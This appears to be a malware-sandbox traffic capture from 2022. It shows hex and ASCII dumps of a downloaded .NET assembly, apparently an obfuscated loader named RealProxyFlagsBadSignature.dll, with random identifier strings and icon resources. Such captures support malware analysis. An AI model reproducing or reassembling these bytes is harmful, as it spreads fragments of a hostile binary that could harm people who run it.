                                                                                        2022-08-08 15:18:44 UTC151INData Raw: 06 00 64 00 6d 0b 06 00 7b 00 6d 0b 12 00 c9 11 4b 0f 06 00 41 0d 6d 0b 06 00 5d 0a 6d 0b 06 00 aa 0c 6d 0b 06 00 bf 12 6d 0b 06 00 38 0f 6d 0b 0a 00 3a 06 9a 0f 06 00 58 07 4b 0f 12 00 89 07 f5 0a 12 00 ca 06 f5 0a 12 00 41 07 12 0e 0a 00 a6 0e 5e 0f 06 00 41 08 4b 0f 0a 00 54 0e 9a 0f 12 00 13 07 df 0b 0a 00 e5 07 59 03 0a 00 cd 07 e3 0f 06 00 91 11 0a 10 06 00 a7 05 6d 0b 06 00 9f 04 6d 0b 06 00 21 0f 6d 0b 0a 00 89 08 59 03 0a 00 0f 00 cb 0a 06 00 a2 07 c4 0f 0e 00 b6 12 25 0d 06 00 39 00 3e 03 06 00 01 00 3e 03 06 00 07 0f 7e 11 06 00 86 04 6d 0b 0e 00 df 06 25 0d 0e 00 ec 04 25 0d 0e 00 fd 03 25 0d 0e 00 0f 12 25 0d 06 00 7a 04 7e 11 06 00 47 00 3e 03 06 00 6a 00 6d 0b 16 00 7b 04 35 0d 06 00 59 08 0a 10 06 00 ea 06 0a 10 12 00 de 04 4b 0f 12 00 92
                                                                                        Data Ascii: dm{mKAm]mmm8m:XKA^AKTYmm!mY%9>>~m%%%%z~G>jm{5YK
                                                                                        2022-08-08 15:18:44 UTC153INData Raw: 08 28 04 02 01 04 00 2c 30 00 00 00 00 06 18 2b 0f 8a 00 04 00 de 2f 00 00 00 00 01 18 2b 0f 8a 00 04 00 44 30 00 00 00 00 16 08 76 09 a9 02 04 00 a4 30 00 00 00 00 16 08 80 09 c0 02 05 00 04 31 00 00 00 00 16 08 8a 09 dc 02 07 00 6c 31 00 00 00 00 16 08 9d 09 f2 02 09 00 cc 31 00 00 00 00 16 08 8a 09 01 03 0c 00 ea 31 00 00 00 00 16 08 9d 09 0a 03 0e 00 f8 31 00 00 00 00 16 00 fd 07 1b 03 11 00 24 32 00 00 00 00 16 00 28 07 33 03 13 00 4c 32 00 00 00 00 16 00 cd 10 49 03 15 00 ac 32 00 00 00 00 16 00 cd 10 bb 03 19 00 20 33 00 00 00 00 16 00 cd 10 2c 04 1d 00 c4 34 00 00 00 00 03 18 2b 0f 77 04 21 00 e4 34 00 00 00 00 03 00 af 12 8e 04 24 00 10 35 00 00 00 00 03 00 17 12 9c 04 25 00 54 35 00 00 00 00 11 18 31 0f 73 00 26 00 be 35 00 00 00 00 06 18 2b 0f
                                                                                        Data Ascii: (,0+/+D0v01l1111$2(3L2I2 3,4+w!4$5%T51s&5+
                                                                                        2022-08-08 15:18:44 UTC154INData Raw: 74 0a 00 00 02 00 e4 03 00 00 03 00 90 0a 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 19 03 00 00 02 00 b2 0a 00 00 03 00 9e 06 00 00 01 00 9b 12 00 00 01 00 19 03 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 0b 00 b2 0a 00 00 0c 00 9e 06 00 00 01 00 dc 0c 00 00 02 00 1a 0c 00 00 03 00 9b 12 00 00 01 00 55 05 00 00 02 00 73 05 00 00 03 00 e7 10 00 00 04 00 bc 10 00 00 05 00 a1 10 00 00 06 00 21 11 00 00 07 00 cb 12 00 00 08 00 b3 13 00 00 09 00 dc 0c 00 00 0a 00 1a 0c 00 00 01 00 25 12 00 00 02 00 e8 03 00 00 01 00 cc 03 00 00 02 00 65 13 00 00 03 00 b2 0a 00 00 04 00 9e 06 00
                                                                                        Data Ascii: t%%Us!Us!%e
                                                                                        2022-08-08 15:18:44 UTC155INData Raw: 05 41 00 01 12 ea 05 59 00 e8 0c f1 05 49 00 2b 0f 8a 00 b1 01 a9 13 f4 05 a1 01 06 11 01 06 c1 01 d2 0e 07 06 31 00 96 03 0d 06 31 00 2a 0b 8a 00 c1 01 c0 0e 73 00 51 01 27 13 22 06 51 01 02 13 22 06 41 00 d8 13 a1 04 41 00 f5 03 33 06 c9 01 81 06 39 06 19 00 59 11 60 07 c1 00 9c 13 66 07 f1 01 2b 0f 6c 07 11 02 d7 03 e7 07 09 02 2b 0f 8a 00 19 02 2b 0f 85 00 21 02 2b 0f 85 00 29 02 2b 0f 85 00 31 02 2b 0f 85 00 39 02 2b 0f 85 00 41 02 2b 0f 85 00 49 02 2b 0f 85 00 51 02 2b 0f d3 08 61 02 2b 0f e3 08 69 02 2b 0f 8a 00 71 02 2b 0f 85 00 79 02 2b 0f 85 00 51 02 2b 0f 67 09 29 00 b3 00 2f 01 2e 00 7b 03 7a 02 2e 00 83 03 7a 02 2e 00 8b 03 71 08 2e 00 93 03 7a 02 2e 00 9b 03 91 08 2e 00 a3 03 71 08 2e 00 ab 03 bb 08 2e 00 b3 03 da 08 2e 00 2b 01 7a 02 2e 00
                                                                                        Data Ascii: AYI+11*sQ'"Q"AA39Y`f+l++!+)+1+9+A+I+Q+a+i+q+y+Q+g)/.{z.z.q.z..q...+z.
                                                                                        2022-08-08 15:18:44 UTC157INData Raw: 60 31 00 43 6f 6e 74 65 78 74 56 61 6c 75 65 60 31 00 54 68 72 65 61 64 53 61 66 65 4f 62 6a 65 63 74 50 72 6f 76 69 64 65 72 60 31 00 49 45 6e 75 6d 65 72 61 74 6f 72 60 31 00 4c 69 73 74 60 31 00 52 65 73 65 72 76 65 64 31 00 52 65 61 64 49 6e 74 33 32 00 54 6f 49 6e 74 33 32 00 46 75 6e 63 60 32 00 52 65 73 65 72 76 65 64 32 00 49 6e 74 36 34 00 54 6f 49 6e 74 31 36 00 3c 4d 6f 64 75 6c 65 3e 00 67 65 74 45 6e 63 6f 64 69 6e 67 43 4d 53 53 45 43 54 49 4f 4e 45 4e 54 52 59 49 44 4d 45 54 41 44 41 54 41 00 65 72 49 6c 4f 48 6d 54 6a 76 46 55 52 55 42 00 46 7a 52 58 72 4e 58 52 41 46 43 71 5a 51 44 00 73 44 47 57 6a 74 49 6e 6e 65 41 74 76 51 44 00 73 4c 45 58 52 67 6d 42 45 4f 62 4c 7a 6c 44 00 4e 58 6e 64 55 49 50 75 6f 47 50 47 47 42 46 00 68 6c 49 4b
                                                                                        Data Ascii: `1ContextValue`1ThreadSafeObjectProvider`1IEnumerator`1List`1Reserved1ReadInt32ToInt32Func`2Reserved2Int64ToInt16<Module>getEncodingCMSSECTIONENTRYIDMETADATAerIlOHmTjvFURUBFzRXrNXRAFCqZQDsDGWjtInneAtvQDsLEXRgmBEObLzlDNXndUIPuoGPGGBFhlIK
                                                                                        2022-08-08 15:18:44 UTC158INData Raw: 6e 61 6d 65 00 44 61 74 65 54 69 6d 65 00 63 6f 6d 6d 61 6e 64 4c 69 6e 65 00 56 61 6c 75 65 54 79 70 65 00 4e 6f 50 72 69 6e 63 69 70 61 6c 4d 61 6b 65 50 6f 69 6e 74 65 72 54 79 70 65 00 47 65 74 54 79 70 65 00 74 79 70 65 00 53 79 73 74 65 6d 2e 43 6f 72 65 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 43 6c 6f 73 75 72 65 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 00 67 65 74 5f 43 75 6c 74 75 72 65 00 73 65 74 5f 43 75 6c 74 75 72 65 00 72 65 73 6f 75 72 63 65 43 75 6c 74 75 72 65 00 47 65 6e 65 72 69 63 46 69 65 6c 64 49 6e 66 6f 43 6f 64 65 42 61 73 65 00 41 70 70 6c 69 63 61 74 69 6f 6e 42 61 73 65 00 52 65 61 64 4f 6e 6c 79 43 6f 6c 6c 65 63 74 69 6f 6e 42 61 73 65 00 41 70 70
                                                                                        Data Ascii: nameDateTimecommandLineValueTypeNoPrincipalMakePointerTypeGetTypetypeSystem.CoreRemoveNamespaceAttributesClosureRealProxyFlagsBadSignatureget_Cultureset_CultureresourceCultureGenericFieldInfoCodeBaseApplicationBaseReadOnlyCollectionBaseApp
                                                                                        2022-08-08 15:18:44 UTC159INData Raw: 62 61 63 6b 00 4d 61 72 73 68 61 6c 00 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 42 61 73 69 63 2e 4d 79 53 65 72 76 69 63 65 73 2e 49 6e 74 65 72 6e 61 6c 00 53 79 73 74 65 6d 2e 43 6f 6d 70 6f 6e 65 6e 74 4d 6f 64 65 6c 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 64 6c 6c 00 4b 69 6c 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 73 65 74 41 73 42 6f 6f 6c 00 4d 65 6d 6f 72 79 42 61 72 72 69 65 72 55 43 4f 4d 49 53 74 72 65 61 6d 00 65 6c 65 6d 00 67 65 74 5f 49 74 65 6d 00 53 79 73 74 65 6d 00 55 48 47 49 55 66 4c 6a 59 49 49 4a 72 75 74 46 43 50 72 5a 4e 6d 73 4b 4a 63 47 67 5a 4e 44 68 72 66 4d 68 4f 56 4e 65 46 54 52 72 43 4a 4b 62 54 66 63 75 4d 66 43 69 6a 77 7a 4d 5a 66 65 4b 45 77 52 4d 44 4d 4d 43 42
                                                                                        Data Ascii: backMarshalMicrosoft.VisualBasic.MyServices.InternalSystem.ComponentModelRealProxyFlagsBadSignature.dllKillMemoryBarriersetAsBoolMemoryBarrierUCOMIStreamelemget_ItemSystemUHGIUfLjYIIJrutFCPrZNmsKJcGgZNDhrfMhOVNeFTRrCJKbTfcuMfCijwzMZfeKEwRMDMMCB
                                                                                        2022-08-08 15:18:44 UTC161INData Raw: 65 2e 43 6f 6d 70 69 6c 65 72 53 65 72 76 69 63 65 73 00 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 4d 79 2e 52 65 73 6f 75 72 63 65 73 00 52 65 61 6c 50 72 6f 78 79 46 6c 61 67 73 42 61 64 53 69 67 6e 61 74 75 72 65 2e 52 65 73 6f 75 72 63 65 73 2e 72 65 73 6f 75 72 63 65 73 00 44 65 62 75 67 67 69 6e 67 4d 6f 64 65 73 00 69 6e 68 65 72 69 74 48 61 6e 64 6c 65 73 00 67 65 74 5f 4d 6f 64 75 6c 65 73 00 74 68 72 65 61 64 41 74 74 72 69 62 75 74 65 73 00 52 65 6d 6f 76 65 4e 61 6d 65 73 70 61 63 65 41 74 74 72 69 62 75 74 65 73 00 70 72 6f 63 65 73 73 41 74 74 72 69 62 75 74 65 73 00 6d 5f 61 74 74 72 69 62 75 74 65 73 00 47 65 74 42 79 74 65 73 00 6d 5f 69 6e 53 63 6f
                                                                                        Data Ascii: e.CompilerServicesSystem.ResourcesRealProxyFlagsBadSignature.My.ResourcesRealProxyFlagsBadSignature.Resources.resourcesDebuggingModesinheritHandlesget_ModulesthreadAttributesRemoveNamespaceAttributesprocessAttributesm_attributesGetBytesm_inSco
                                                                                        2022-08-08 15:18:44 UTC162INData Raw: 76 00 53 00 6a 00 5a 00 51 00 63 00 47 00 6a 00 44 00 4f 00 74 00 42 00 55 00 64 00 74 00 76 00 6b 00 6a 00 58 00 64 00 6f 00 46 00 46 00 63 00 4b 00 6b 00 70 00 55 00 4a 00 48 00 46 00 7a 00 58 00 48 00 65 00 63 00 61 00 42 00 72 00 64 00 6c 00 4f 00 4b 00 4e 00 4f 00 50 00 5a 00 41 00 79 00 72 00 65 00 4d 00 75 00 47 00 49 00 55 00 4c 00 78 00 7a 00 53 00 53 00 57 00 42 00 46 00 76 00 6f 00 47 00 6d 00 46 00 72 00 79 00 74 00 48 00 6e 00 76 00 74 00 7a 00 4d 00 6e 00 72 00 69 00 6e 00 79 00 75 00 76 00 53 00 6a 00 5a 00 51 00 63 00 47 00 6a 00 44 00 4f 00 74 00 42 00 55 00 64 00 74 00 76 00 6b 00 6a 00 58 00 64 00 6f 00 46 00 46 00 63 00 4b 00 6b 00 70 00 55 00 4a 00 48 00 46 00 7a 00 58 00 48 00 65 00 63 00 61 00 42 00 72 00 64 00 6c 00 4f 00 4b 00 4e
                                                                                        Data Ascii: vSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKNOPZAyreMuGIULxzSSWBFvoGmFrytHnvtzMnrinyuvSjZQcGjDOtBUdtvkjXdoFFcKkpUJHFzXHecaBrdlOKN
                                                                                        2022-08-08 15:18:44 UTC163INData Raw: 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 65 00 6e 00 72 00 65 00 79 00 6e 00 4c 00 74 00 77 00 64 00 46 00 42 00 6f 00 6a 00 6f 00 54 00 68 00 6c 00 4a 00 6a 00 4e 00 4d 00 51 00 53 00 55 00 48 00 4a 00 62 00 79 00 51 00 67 00 51 00 41 00 63 00 46 00 55 00 52 00 6b 00 7a 00 72 00 51 00 45 00 49 00 6b 00 48 00 41 00 72 00 6c 00 54 00 77 00 41 00 44 00 51 00 70 00 41 00 6d 00 59 00 7a 00 4b 00 72 00 7a 00 6b 00 50 00 67 00 77 00 4a 00 42 00 4d 00 64 00 6f 00 57 00 52 00 47 00 6e 00 53 00 4a 00 59 00 67 00 67 00 54 00 50 00 58 00 63 00 43 00 6b 00 6b 00 00 80 a3 79 00 6e 00 4c
                                                                                        Data Ascii: TwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkenreynLtwdFBojoThlJjNMQSUHJbyQgQAcFURkzrQEIkHArlTwADQpAmYzKrzkPgwJBMdoWRGnSJYggTPXcCkkynL
                                                                                        2022-08-08 15:18:44 UTC165INData Raw: 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 50 00 65 00 74 00 61 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67 00 45 00 49 00 69 00 4a 00 77 00 66 00 73 00 5a 00 50 00 58 00 50 00 73 00 70 00 79 00 67 00 50 00 55 00 4e 00 6e 00 69 00 6a 00 54 00 46 00 6a 00 4e 00 65 00 46 00 45 00 4b 00 52 00 45 00 41 00 75 00 6a 00 69 00 65 00 64 00 58 00 4d 00 73 00 69 00 51 00 72 00 62 00 71 00 79 00 42 00 43 00 64 00 4c 00 50 00 74 00 55 00 55 00 77 00 6b 00 43 00 55 00 76 00 52 00 76 00 4a 00 50 00 54 00 6f 00 4f 00 53 00 47 00 50 00 65 00 72 00 43 00 7a 00 6b 00 71 00 72 00 67 00 4a 00 47 00 6b 00 6c 00 6e 00 44 00 67
                                                                                        Data Ascii: QrbqyBCdLPtUUwkCUvRvJPToOSGPPetazkqrgJGklnDgEIiJwfsZPXPspygPUNnijTFjNeFEKREAujiedXMsiQrbqyBCdLPtUUwkCUvRvJPToOSGPerCzkqrgJGklnDg
                                                                                        2022-08-08 15:18:44 UTC166INData Raw: 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 65 00 47 00 00 80 a3 58 00 47 00 52 00 41 00 50 00 56 00 53 00 78 00 79 00 4f 00 6a 00 63 00 58 00 62 00 54 00 42 00 4b 00 41 00 5a 00 48 00 53 00 63 00 65 00 78 00 75 00 53 00 74 00 42 00 74 00 49 00 77 00 67 00 76 00 6d 00 61 00 45 00 54 00 73 00 5a 00 55 00 64 00 49 00 59 00 62 00 4c 00 4b 00 58 00 43 00 51 00 52 00 64 00 4f 00 4e 00 55 00 53 00 76 00 63 00 70 00 61 00 53 00 77 00 52 00 44 00 71 00 52 00 44 00 68 00 46 00 41 00 4f 00 44 00 6d 00 62 00 46 00 64 00 4b 00 59 00 44 00 6c 00 46 00 76 00 00 82 a9 74 00 78 00 4c 00 46 00 77 00 65 00 69 00 6e 00 61 00 55 00 41 00 78 00 79 00 52 00 63 00 74 00 4d 00 45 00 68 00 4a 00 64 00 63 00 6e 00 42 00 58 00 4f 00
                                                                                        Data Ascii: hFAODmbFdKYDlFveGXGRAPVSxyOjcXbTBKAZHScexuStBtIwgvmaETsZUdIYbLKXCQRdONUSvcpaSwRDqRDhFAODmbFdKYDlFvtxLFweinaUAxyRctMEhJdcnBXO
                                                                                        2022-08-08 15:18:44 UTC167INData Raw: 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 6f 00 43 00 64 00 61 00 65 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48 00 45 00 64 00 52 00 59 00 53 00 48 00 44 00 55 00 6f 00 63 00 4d 00 79 00 6a 00 70 00 4e 00 41 00 61 00 79 00 79 00 49 00 65 00 65 00 6e 00 72 00 65 00 53 00 76 00 59 00 79 00 51 00 41 00 59 00 43 00 47 00 42 00 52 00 43 00 55 00 61 00 70 00 42 00 57 00 61 00 46 00 57 00 42 00 4a 00 74 00 4b 00 51 00 43 00 57 00 65 00 72 00 68 00 54 00 74 00 65 00 47 00 77 00 50 00 59 00 41 00 67 00 52 00 4e 00 6b 00 76 00 7a 00 74 00 73 00 63 00 46 00 72 00 74 00 4e 00 4f 00 7a 00 74 00 4f 00 58 00 52 00 48 00 56 00 48 00 50 00 48
                                                                                        Data Ascii: BJtKQCWeoCdaewPYAgRNkvztscFrtNOztOXRHVHPHEdRYSHDUocMyjpNAayyIeenreSvYyQAYCGBRCUapBWaFWBJtKQCWerhTteGwPYAgRNkvztscFrtNOztOXRHVHPH
                                                                                        2022-08-08 15:18:44 UTC169INData Raw: 00 56 00 5a 00 6d 00 74 00 65 00 53 00 34 00 36 00 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75 00 5a 00 64 00 47 00 47 00 64 00 61 00 61 00 49 00 72 00 7a 00 44 00 64 00 44 00 46 00 42 00 45 00 50 00 53 00 77 00 55 00 56 00 56 00 6f 00 71 00 64 00 5a 00 6c 00 4d 00 67 00 6c 00 4b 00 6e 00 54 00 4f 00 72 00 7a 00 44 00 4a 00 4b 00 41 00 53 00 41 00 6a 00 64 00 56 00 5a 00 6d 00 77 00 6f 00 57 00 00 80 a3 63 00 78 00 76 00 4c 00 5a 00 50 00 41 00 68 00 65 00 72 00 58 00 78 00 6f 00 52 00 64 00 4a 00 51 00 53 00 46 00 58 00 49 00 47 00 49 00 45 00 68 00 56 00 64 00 49 00 42 00 4f 00 68 00 6a 00 64 00 75
                                                                                        Data Ascii: VZmteS46cxvLZPAherXxoRdJQSFXIGIEhVdIBOhjduZdGGdaaIrzDdDFBEPSwUVVoqdZlMglKnTOrzDJKASAjdVZmwoWcxvLZPAherXxoRdJQSFXIGIEhVdIBOhjdu
                                                                                        2022-08-08 15:18:44 UTC170INData Raw: 6f 00 6d 00 65 00 4d 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d 00 47 00 66 00 47 00 50 00 4d 00 47 00 54 00 51 00 4d 00 6c 00 56 00 54 00 4b 00 41 00 61 00 42 00 47 00 6d 00 64 00 4f 00 57 00 66 00 58 00 64 00 76 00 79 00 43 00 53 00 50 00 79 00 4c 00 50 00 44 00 54 00 6a 00 78 00 42 00 50 00 79 00 49 00 73 00 73 00 69 00 6e 00 52 00 64 00 57 00 6a 00 49 00 4b 00 75 00 4c 00 6e 00 76 00 6e 00 52 00 44 00 47 00 41 00 4d 00 45 00 46 00 71 00 48 00 6d 00 4b 00 71 00 4f 00 56 00 6c 00 7a 00 58 00 69 00 4e 00 77 00 6c 00 55 00 6f 00 48 00 4b 00 77 00 41 00 6d
                                                                                        Data Ascii: omeMinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAmGfGPMGTQMlVTKAaBGmdOWfXdvyCSPyLPDTjxBPyIssinRdWjIKuLnvnRDGAMEFqHmKqOVlzXiNwlUoHKwAm
                                                                                        2022-08-08 15:18:44 UTC171INData Raw: 00 74 00 4e 00 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74 00 64 00 53 00 6e 00 77 00 6d 00 45 00 49 00 54 00 74 00 76 00 6b 00 45 00 41 00 70 00 59 00 66 00 63 00 64 00 51 00 6f 00 50 00 48 00 70 00 6a 00 54 00 5a 00 69 00 43 00 4e 00 4c 00 6e 00 42 00 46 00 63 00 73 00 51 00 49 00 65 00 00 80 a3 42 00 71 00 6d 00 47 00 68 00 74 00 48 00 46 00 74 00 48 00 42 00 58 00 6f 00 6c 00 6b 00 76 00 64 00 63 00 55 00 4f 00 44 00 42 00 41 00 6a 00 76 00 46 00 51 00 4c 00 52 00 79 00 41 00 4c 00 49 00 56 00 68 00 42 00 4f 00 51 00 51 00 42 00 4d 00 53 00 74
                                                                                        Data Ascii: tNBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMStdSnwmEITtvkEApYfcdQoPHpjTZiCNLnBFcsQIeBqmGhtHFtHBXolkvdcUODBAjvFQLRyALIVhBOQQBMSt
                                                                                        2022-08-08 15:18:44 UTC173INData Raw: 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70 00 73 00 58 00 51 00 77 00 61 00 4c 00 6f 00 7a 00 49 00 4e 00 70 00 52 00 68 00 55 00 66 00 4b 00 53 00 68 00 57 00 4d 00 6b 00 65 00 6f 00 45 00 46 00 51 00 72 00 68 00 54 00 4e 00 7a 00 4e 00 59 00 51 00 53 00 55 00 6c 00 6a 00 57 00 63 00 42 00 6c 00 51 00 71 00 50 00 44 00 65 00 48 00 76 00 56 00 70 00 77 00 52 00 77 00 71 00 47 00 66 00 6c 00 76 00 4a 00 6e 00 46 00 44 00 51 00 4c 00 5a 00 47 00 53 00 47 00 69 00 46 00 4c 00 48 00 68 00 72 00 75 00 48 00 58 00 41 00 48 00 6f 00 63 00 74 00 70
                                                                                        Data Ascii: BlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctpsXQwaLozINpRhUfKShWMkeoEFQrhTNzNYQSUljWcBlQqPDeHvVpwRwqGflvJnFDQLZGSGiFLHhruHXAHoctp
                                                                                        2022-08-08 15:18:44 UTC174INData Raw: 01 01 1e 00 1e 00 04 07 01 1e 00 07 30 01 01 01 10 1e 00 07 20 04 01 0e 0e 0e 0e 61 01 00 34 53 79 73 74 65 6d 2e 57 65 62 2e 53 65 72 76 69 63 65 73 2e 50 72 6f 74 6f 63 6f 6c 73 2e 53 6f 61 70 48 74 74 70 43 6c 69 65 6e 74 50 72 6f 74 6f 63 6f 6c 12 43 72 65 61 74 65 5f 5f 49 6e 73 74 61 6e 63 65 5f 5f 13 44 69 73 70 6f 73 65 5f 5f 49 6e 73 74 61 6e 63 65 5f 5f 00 00 00 07 06 15 12 71 01 13 00 09 07 04 13 00 13 00 13 00 02 06 15 12 18 01 13 00 06 15 12 71 01 13 00 02 13 00 04 0a 01 13 00 05 20 01 01 13 00 04 28 00 13 00 04 20 01 01 02 05 01 00 00 00 00 0c 07 04 0e 12 79 15 12 7d 01 12 79 02 07 15 12 80 81 01 12 79 08 20 00 15 12 7d 01 13 00 06 15 12 7d 01 12 79 03 20 00 02 0a 00 01 0e 15 12 80 81 01 12 79 0b 07 03 12 79 15 12 7d 01 12 79 02 0b 00 02 01
                                                                                        Data Ascii: 0 a4System.Web.Services.Protocols.SoapHttpClientProtocolCreate__Instance__Dispose__Instance__qq ( y}yy }}y yy}y
                                                                                        2022-08-08 15:18:44 UTC175INData Raw: 80 ed 18 08 08 08 08 12 80 f1 1c 08 20 05 08 18 08 08 08 08 0a 20 03 12 80 ed 18 12 80 f1 1c 04 20 01 08 18 02 06 09 03 06 1d 05 02 1e 24 04 06 12 80 f9 04 06 12 80 fd 09 07 03 12 80 f9 12 80 f9 02 05 00 02 02 1c 1c 05 20 00 12 81 01 07 20 02 01 0e 12 81 01 05 00 00 12 80 f9 05 07 01 12 80 fd 05 00 00 12 80 fd 06 00 01 01 12 80 fd 05 08 00 12 80 f9 08 01 00 02 00 00 00 00 00 05 08 00 12 80 fd 40 01 00 33 53 79 73 74 65 6d 2e 52 65 73 6f 75 72 63 65 73 2e 54 6f 6f 6c 73 2e 53 74 72 6f 6e 67 6c 79 54 79 70 65 64 52 65 73 6f 75 72 63 65 42 75 69 6c 64 65 72 07 34 2e 30 2e 30 2e 30 00 00 03 06 12 60 08 00 01 12 81 09 12 81 09 04 07 01 12 60 04 00 00 12 60 04 08 00 12 60 59 01 00 4b 4d 69 63 72 6f 73 6f 66 74 2e 56 69 73 75 61 6c 53 74 75 64 69 6f 2e 45 64 69
                                                                                        Data Ascii: $ @3System.Resources.Tools.StronglyTypedResourceBuilder4.0.0.0````YKMicrosoft.VisualStudio.Edi
                                                                                        2022-08-08 15:18:44 UTC177INData Raw: 00 00 00 01 00 00 00 00 00 78 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 88 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 98 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 a8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 b8 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 00 00 c8 01 00 00 18 e5 00 00 28 01 00 00 00 00 00 00 00 00 00 00 40 e6 00 00 68 05 00 00 00 00 00 00 00 00 00 00 a8 eb 00 00 68 04 00 00 00 00 00 00 00 00 00 00 10 f0 00 00 e8 02 00 00 00 00 00 00 00 00 00 00 f8 f2 00 00 a8 08 00 00 00 00 00 00 00 00 00 00 a0 fb 00 00 a8 10 00 00 00 00 00 00 00 00 00 00 48 0c 01 00 5a 00 00 00 00 00 00 00 00 00 00 00 d8 e1 00 00 40 03 00 00 00 00
                                                                                        Data Ascii: x(@hhHZ@
                                                                                        2022-08-08 15:18:44 UTC178INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 08 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 01 00 00 00 01 00 00 00 00 00 00 42 42 42 00 f1 ef f0 00 f6 f6 f6 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                        Data Ascii: ( BBB
                                                                                        2022-08-08 15:18:44 UTC179INData Raw: 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 ff ff 00 00 28 00 00 00 10 00 00 00 20 00 00 00 01 00 20 00 00 00 00 00 40 04 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff f6 f6 f6 ff 42 42 